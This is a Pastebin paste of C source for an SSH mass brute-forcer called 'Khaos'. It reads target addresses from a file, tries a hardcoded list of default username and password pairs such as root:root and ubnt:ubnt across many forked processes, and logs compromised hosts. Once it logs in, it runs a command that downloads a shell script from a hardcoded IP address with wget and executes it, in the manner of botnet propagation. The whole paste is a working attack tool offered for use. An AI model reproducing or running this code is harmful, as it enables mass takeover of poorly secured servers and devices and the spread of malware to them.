API tools faq
paste
Advertisement
KhaosBringer

Khaos Mass Bruteforcer.c

KhaosBringer
May 12th, 2019
1,364
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.22 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * cp /usr/local/lib/libssh.so /usr/lib/
  3. *
  4. * gcc -o update update.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
  5. *
  6. */
  7. #include <stdio.h>
  8. #include <arpa/inet.h>
  9. #include <libssh/libssh.h>
  10. #include <netinet/in.h>
  11. #include <string.h>
  12. #include <sys/socket.h>
  13. #include <sys/types.h>
  14. #include <netdb.h>
  15. #include <errno.h>
  16. #include <fcntl.h>
  17. #include <time.h>
  18.  
  19. #define NORM  "\033[00;00m"
  20.  
  21. #define ALBASTRU "\033[01;34m"
  22.  
  23. int test_pass(char *user, char *password, char *host) {
  24.     ssh_session my_ssh_session;
  25.     ssh_channel channel;
  26.     int rc;
  27.     // Open session and set options
  28.     my_ssh_session = ssh_new();
  29.     if (my_ssh_session == NULL)
  30.     return -1;
  31.     ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, host);
  32.     ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, user);
  33.     // Connect to server
  34.     rc = ssh_connect(my_ssh_session);
  35.     if (rc != SSH_OK) {
  36.         ssh_get_error(my_ssh_session);
  37.         ssh_free(my_ssh_session);
  38.         return -1;
  39.     }
  40.     // Authenticate ourselves
  41.     rc = ssh_userauth_password(my_ssh_session, NULL, password);
  42.     if (rc != SSH_AUTH_SUCCESS) {
  43.         ssh_get_error(my_ssh_session);
  44.         ssh_disconnect(my_ssh_session);
  45.         ssh_free(my_ssh_session);
  46.         exit(-1);
  47.     } else {
  48.         channel = ssh_channel_new(my_ssh_session);
  49.         if (channel == NULL) return SSH_ERROR;
  50.         rc = ssh_channel_open_session(channel);
  51.         if (rc != SSH_OK) {
  52.             rc = ssh_channel_request_exec(channel, "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh");
  53.             if (rc != SSH_OK) {
  54.                 return 1;
  55.             }
  56.         }
  57.     }
  58.     ssh_disconnect(my_ssh_session);
  59.     ssh_free(my_ssh_session);
  60. }
  61.  
  62. void checkauth(char *user, char *password, char *host) {
  63.     struct sockaddr_in addr_s; struct hostent *hp; struct in_addr  *myaddr;
  64.     FILE *vulnf;
  65.     short int fd=-1;
  66.     fd_set fdset;
  67.     struct timeval tv;
  68.     int rc;
  69.     int so_error;
  70.     socklen_t len;
  71.     struct timespec tstart={0,0}, tend={0,0};
  72.     int seconds = 1;
  73.     password[strlen(password)-1] = 0;
  74.     host[strlen(host)-1] = 0;
  75.     addr_s.sin_family = AF_INET; // utilizzo IPv4
  76.     addr_s.sin_addr.s_addr = inet_addr(host);
  77.     addr_s.sin_port = htons(22);
  78.  
  79.     clock_gettime(CLOCK_MONOTONIC, &tstart);
  80.  
  81.     fd = socket(AF_INET, SOCK_STREAM, 0);
  82.     fcntl(fd, F_SETFL, O_NONBLOCK); // setup non blocking socket
  83.  
  84.     // make the connection
  85.     rc = connect(fd, (struct sockaddr *)&addr_s, sizeof(addr_s));
  86.     if ((rc == -1) && (errno != EINPROGRESS)) {
  87.         close(fd);
  88.         return;
  89.     }
  90.  
  91.     FD_ZERO(&fdset);
  92.     FD_SET(fd, &fdset);
  93.     tv.tv_sec = seconds;
  94.     tv.tv_usec = 0;
  95.  
  96.     rc = select(fd + 1, NULL, &fdset, NULL, &tv);
  97.     switch(rc) {
  98.     case 1: // data to read
  99.         len = sizeof(so_error);
  100.  
  101.         getsockopt(fd, SOL_SOCKET, SO_ERROR, &so_error, &len);
  102.  
  103.         if (so_error == 0) {
  104.             clock_gettime(CLOCK_MONOTONIC, &tend);
  105.         } else { // error
  106.             return;
  107.         }
  108.         break;
  109.     case 0: //timeout
  110.         return;
  111.     }
  112.     close(fd);
  113.     if(test_pass(user, password, host)) {
  114.         myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  115.         myaddr->s_addr=inet_addr(host);
  116.         hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  117.         if((hp!=NULL)){
  118.             vulnf=fopen("vuln.txt","a+");
  119.             fprintf(vulnf,"%s:%s:%s\n",user,password,hp->h_name);
  120.             printf("\nKhaos Got Another root -> %s:%s:%s -> %s\n",user,password,host,hp->h_name);
  121.         } else {
  122.             vulnf=fopen("vuln.txt","a+");
  123.             fprintf(vulnf,"%s:%s:%s\n",user,password,host);
  124.             printf("\nKhaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n",user,password,host);
  125.         }
  126.     }
  127. }
  128. int main(int argc, char **argv)
  129. {
  130.     FILE *fp, *vulnf;
  131.     char *c;
  132.     char buff[4096];
  133.     int i;
  134.     int numforks,maxf;
  135.     char *combos[28][2];
  136.     combos[0][0] = "root";
  137.     combos[0][1] = "root";
  138.     combos[1][0] = "root";
  139.     combos[1][1] = "admin";
  140.     combos[2][0] = "root";
  141.     combos[2][1] = "password";
  142.     combos[3][0] = "root";
  143.     combos[3][1] = "default";
  144.     combos[4][0] = "root";
  145.     combos[4][1] = "toor";
  146.     combos[5][0] = "admin";
  147.     combos[5][1] = "admin";
  148.     combos[6][0] = "admin";
  149.     combos[6][1] = "1234";
  150.     combos[7][0] = "admin";
  151.     combos[7][1] = "12345";
  152.     combos[8][0] = "admin";
  153.     combos[8][1] = "password";
  154.     combos[9][0] = "ubnt";
  155.     combos[9][1] = "ubnt";
  156.     combos[10][0] = "vagrant";
  157.     combos[10][1] = "vagrant";
  158.     combos[11][0] = "test";
  159.     combos[11][1] = "test";
  160.     combos[12][0] = "root";
  161.     combos[12][1] = "ubnt";
  162.     combos[13][0] = "telnet";
  163.     combos[13][1] = "telnet";
  164.     combos[14][0] = "guest";
  165.     combos[14][1] = "guest";
  166.     combos[15][0] = "root";
  167.     combos[15][1] = "vagrant";
  168.     combos[16][0] = "default";
  169.     combos[16][1] = "";
  170.     combos[17][0] = "cisco";
  171.     combos[17][1] = "cisco";
  172.     combos[18][0] = "root";
  173.     combos[18][1] = "5up";
  174.     combos[19][0] = "user";
  175.     combos[19][1] = "password";
  176.     combos[20][0] = "user";
  177.     combos[20][1] = "user";
  178.     combos[21][0] = "root";
  179.     combos[21][1] = "debian";
  180.     combos[22][0] = "root";
  181.     combos[22][1] = "alpine";
  182.     combos[23][0] = "root";
  183.     combos[23][1] = "ceadmin";
  184.     combos[24][0] = "root";
  185.     combos[24][1] = "indigo";
  186.     combos[25][0] = "root";
  187.     combos[25][1] = "linux";
  188.     combos[26][0] = "root";
  189.     combos[26][1] = "rootpasswd";
  190.     combos[27][0] = "root";
  191.     combos[27][1] = "timeserver";
  192.     struct hostent *hp; struct in_addr  *myaddr;
  193.     if((fp=fopen("mfu.txt","r"))==NULL) exit(printf("\e[1;31mFATAL: I Can't Open mfu.txt\n"NORM));
  194.     printf("\e[1;31mKhaos SSH Bruter \e[00;00m- \e[1;32m\n"NORM);
  195.     maxf=atoi(argv[1]);
  196.  
  197.     while(fgets(buff,sizeof(buff),fp))
  198.     {
  199.         c=strchr(buff,'n');
  200.         if(c!=NULL) *c='.';
  201.         if (!(fork())) {
  202.             //   printf("--> Atacare %s",buff);
  203.             for(i = 0; i < 27; i++) {
  204.                 buff[strlen(buff)-1] = 0;
  205.                 if(test_pass(combos[i][0], combos[i][0], buff)) {
  206.                     myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
  207.                     myaddr->s_addr=inet_addr(buff);
  208.                     hp = gethostbyaddr((char *) myaddr,4,AF_INET);
  209.                     if((hp!=NULL)){
  210.                         vulnf=fopen("vuln.txt","a+");
  211.                         fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], hp->h_name);
  212.                         printf("Khaos Got Another root -> %s:%s:%s -> %s\n", combos[i][0], combos[i][1], buff, hp->h_name);
  213.                     } else {
  214.                         vulnf=fopen("vuln.txt","a+");
  215.                         fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], buff);
  216.                         printf("Khaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n", combos[i][0], combos[i][1], buff);
  217.                     }
  218.                     break;
  219.                 }
  220.             }
  221.             exit(0);
  222.         } else {
  223.             numforks++;
  224.             if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL);
  225.         }
  226.     }
  227. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!